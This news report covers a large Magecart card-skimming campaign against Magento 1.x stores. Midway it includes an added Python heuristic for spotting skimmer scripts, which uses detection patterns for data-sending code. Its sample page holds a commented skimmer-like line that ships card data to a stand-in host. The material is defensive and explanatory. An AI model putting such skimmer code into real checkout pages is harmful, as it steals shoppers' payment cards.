More than 2,000 Magento online stores were hacked over the weekend in what security researchers described as the “biggest campaign ever.”
The attacks followed the typical Magecart pattern: the attackers broke into the sites and implanted malicious scripts in the stores' source code, scripts that recorded the payment card details shoppers entered into the stores' payment forms.
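As an added illustration of the detection side (this is example code, not code from the article or from SanSec): a stdlib-only Python heuristic that flags scripts which read card fields, use a data-sending primitive and name a host other than the store's own, run over a constructed sample checkout page. The hostnames and the skimmer-like fragment in the sample are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Heuristics: a skimmer both reads card fields and ships data to another host.
CARD_FIELD_RE = re.compile(r"cc_number|card_?number|cvv|cvc|expir|cardholder", re.I)
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

class ScriptCollector(HTMLParser):
    """Collects every <script> as [src attribute or None, inline body]."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append([dict(attrs).get("src"), ""])
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1][1] += data

def find_skimmer_candidates(html, first_party_host):
    """Return scripts that touch card fields, use an exfil primitive and name a foreign host."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        hosts = {h.lower() for h in HOST_RE.findall(body + " " + (src or ""))}
        foreign = sorted(h for h in hosts if h != first_party_host.lower())
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body) and foreign:
            findings.append({"src": src, "hosts": foreign, "snippet": body.strip()[:60]})
    return findings

# Constructed sample checkout page: one first-party script, one benign inline
# validator, and one skimmer-like fragment (described in a comment, not functional).
SAMPLE_PAGE = """<html><body>
<script src="https://shop.example/static/checkout.js"></script>
<script>
  // benign: validates cc_number locally, never leaves shop.example
  if (!/^\\d{16}$/.test(document.getElementById('cc_number').value)) alert('bad card');
</script>
<script>
  /* skimmer-like fragment: on submit read cc_number and cvv, then set
     new Image().src = 'https://stats-cdn.example/collect?d=...' */
</script>
</body></html>"""
```

In practice you would run this over the rendered checkout HTML of each store and diff the foreign hosts against an allow-list of the store's known payment and CDN providers.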
“On Friday 10 stores were infected, then 1,058 on Saturday, 603 on Sunday and 233 today,” said Willem de Groot, founder of Sanguine Security (SanSec), a Dutch cybersecurity company specializing in monitoring Magecart attacks.
“This automated campaign is by far the largest Sansec has identified since it began monitoring in 2015,” added de Groot. “The previous record was 962 stores hacked in one day in July of last year.”
Most stores were running an EOL version
The SanSec executive said that most of the compromised sites are running version 1.x of the Magento online store software.
This version of Magento reached its End of Life (EOL) on June 30, 2020, and no longer receives security updates.
Ironically, attacks on sites running the now obsolete Magento 1.x software had been expected since last year, when Adobe, Magento's owner, issued its first alert in November 2019 telling store owners they needed to upgrade to the 2.x branch.
Adobe’s initial warning of impending attacks on Magento 1.x stores was later echoed in similar security advisories issued by Mastercard and Visa in the spring.
In our coverage of the Mastercard and Visa alerts, several experts in the web security community told this reporter that no new vulnerabilities in Magento 1.x had surfaced for some time, which was unusual since the 1.x branch was old and riddled with security holes.
At the time, these security experts believed that hackers were intentionally sitting on their Magento 1.x exploits and waiting for the EOL to arrive, to make sure Adobe didn’t fix their bugs.
It seems these experts were right.
While de Groot has yet to identify how the hackers broke into the targeted sites over the weekend, the SanSec founder said an advertisement for a Magento 1.x zero-day vulnerability was posted on underground hacking forums last month, confirming that hackers had been waiting for the EOL to arrive.
In the ad, a user named z3r0day offered to sell a remote code execution (RCE) exploit for $5,000, an offer deemed credible at the time.
The good news is that since November 2019, when Adobe started urging Magento owners to migrate to the new branch, the number of Magento 1.x stores has dropped from 240,000 to 110,000 in June 2020 and to 95,000 today.
The pace is slow, but many of the stores that have not been upgraded are believed to be abandoned and to see very little user traffic. However, some high-traffic sites still run the 1.x branch and rely on web application firewalls (WAFs) to stop attacks.
It’s a risky strategy which, while it may be PCI compliant, may not be a smart decision in the long run.
In related news, Adobe also announced last week that it has partnered with SanSec to integrate the security company’s database of over 9,000 Magento malware signatures into the Magento backend, as part of the Security analysis tool.